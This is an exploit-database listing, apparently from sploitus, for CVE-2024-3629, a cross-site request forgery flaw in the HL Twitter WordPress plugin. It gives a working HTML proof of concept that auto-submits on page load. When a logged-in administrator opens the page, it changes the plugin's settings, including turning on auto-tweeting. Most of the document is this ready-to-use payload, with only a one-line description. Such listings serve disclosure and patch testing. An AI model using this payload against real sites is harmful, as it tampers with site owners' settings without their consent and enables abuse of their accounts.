Exploit for HL Twitter <= 2014.1.18 - Settings Update via CSRF CVE-2024-3629

Name: Exploit for HL Twitter <= 2014.1.18 - Settings Update via CSRF CVE-2024-3629
Rating: 5 (67 reviews)

2024-04-24 | CVSS 6.7

## https://sploitus.com/exploit?id=WPEX-ID:C1F6ED2C-0F84-4B13-B39E-5CB91443C2B1
Have a logged in admin open an HTML page containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=hl_twitter_settings" method="POST"> 
        <input type="text" name="object[tweet_format]" value="csrf2" />
        <input type="text" name="object[auto_tweet]" value="on" />
        <input type="text" name="object[archive_slug]" value="csrf2" />
        <input type="text" name="object[update_frequency]" value="hl_1hr" />
        <input type="submit" name="submit" value="Save" />
    </form>
</body>
```